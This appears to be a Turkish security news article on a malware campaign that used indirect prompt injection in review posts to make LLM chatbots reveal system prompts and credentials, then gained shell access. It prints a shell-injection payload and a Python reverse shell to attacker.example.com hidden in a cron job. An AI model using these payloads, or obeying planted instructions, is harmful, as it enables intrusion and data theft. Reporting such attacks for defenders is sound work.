
Geçtiğimiz haftalarda, sohbet robotlarını kurumsal sistemlere gizli giriş noktaları olarak kullanan karmaşık bir kötü amaçlı yazılım kampanyası ortaya çıktı.
İlk olarak Eylül 2025’in ortasında gözlemlenen tehdit aktörleri, büyük dil modelleri üzerine kurulu, müşteriye dönük sohbet uygulamaları çalıştıran kuruluşları hedef aldı.
Saldırganlar, doğal dil işleme ve dolaylı veri alımındaki zayıflıklardan yararlanarak, zararsız kullanıcı etkileşimlerinden yetkisiz sistem erişimine geçmeyi başardı.
İlk olaylar, halka açık bir sohbet robotunun yanlışlıkla harici inceleme sitelerinden kötü amaçlı içerik alması ve bir dizi ayrıcalık artışını tetiklemesi gibi finansal hizmet firmalarını içeriyordu.
Teknik yayıldıkça güvenlik ekipleri, dahili komutların yürütülmesine yol açan anormal istemlerden oluşan endişe verici bir model fark etti.
Trend Micro analistleri, saldırganların öncelikle sohbet robotu arayüzünü hatalı biçimlendirilmiş sorgularla incelediğini ve temeldeki Python tabanlı mikro hizmet yığınını açığa çıkaran hata mesajlarını ortaya çıkardığını tespit etti.
Bu bilgilerle donanmış olarak, üçüncü taraf forumlarda barındırılan dolaylı anlık enjeksiyon yüklerini hazırladılar.
Bu gizli talimatlar, chatbot’un sistem istemini ortaya çıkarmasını ve dahili API uç noktalarını ve kimlik bilgilerini açığa çıkarmasını sağladı.
Trend Micro analistleri, sistem isteminin kontrolü sağlandıktan sonra, saldırganların rutin analiz görevleri gibi görünen başka talimatlar yayınladığını belirtti.
Belgelenen bir durumda, inceleme gönderisindeki tek bir gizli metin satırı—
(Şekil 1)—güvenliği ihlal edilen sohbet robotunun temel mantığını ortaya çıkarmasına neden oldu ve saldırganlara dahili bir özetleme API’sine erişim hakkı verdi.
Buradan, kötü niyetli aktörler hassas müşteri kayıtlarını sorguladılar ve aşağıdaki gibi yükleri kullanarak, temizlenmemiş API çağrıları yoluyla kabuk komutlarını çalıştırdılar: ; ls -la /app;
uygulama dosyalarını numaralandırmak ve ek güvenlik açıklarını belirlemek için.
Kalıcılık Taktikleri
Saldırganlar, ilk başta chatbot hizmetini ihlal ettikten sonra iki yönlü bir ısrar stratejisi uyguladı.
İlk olarak, chatbot kapsayıcısındaki günlük günlük rotasyonlarından sorumlu olan planlanmış bir iş komut dosyasını değiştirdiler.
.webp)
Cron görevine gizlenmiş kod ekleyerek, her günlük döngüsünde bir arka kapı dinleyicisinin yeniden etkinleştirilmesini sağladılar.
Enjekte edilen kod parçası aşağıdakine benziyordu: –
# logrotate hook for persistence
import socket,subprocess,os
s=socket. Socket()
s.connect(("attacker.example.com",4444))
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
subprocess. Call(["/bin/sh","-i"])
Bu rutin, günlükler her döndürüldüğünde ters kabuk sağlıyordu. Eş zamanlı olarak, rakipler, chatbotun sanal ortamına, belirli bir ifade tarafından tetiklenene kadar hareketsiz kalan kötü amaçlı bir Python modülü yerleştirdiler.
Bu modül gelen mesajları yakaladı ve tetikleyiciyi tespit ettikten sonra ters kabuk bağlantısını yeniden başlattı.
Tehdit aktörleri, planlanmış görev manipülasyonunu hareketsiz modülün etkinleştirilmesiyle birleştirerek, hizmetin yeniden başlatılmasından ve konteyner güncellemelerinden sağ çıkabilen dayanıklı bir dayanak elde etti.
Bu tür taktiklerin tespiti, komut dosyası oluşturma ve dağıtım boru hatlarının sürekli izlenmesinin yanı sıra, zamanlanmış işler ve kurulu paketler üzerinde bütünlük kontrollerini gerektirir.
Kuruluşlar yalnızca derinlemesine savunma önlemlerini benimseyerek bu gelişen arka kapı tekniğine karşı koruma sağlayabilir.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.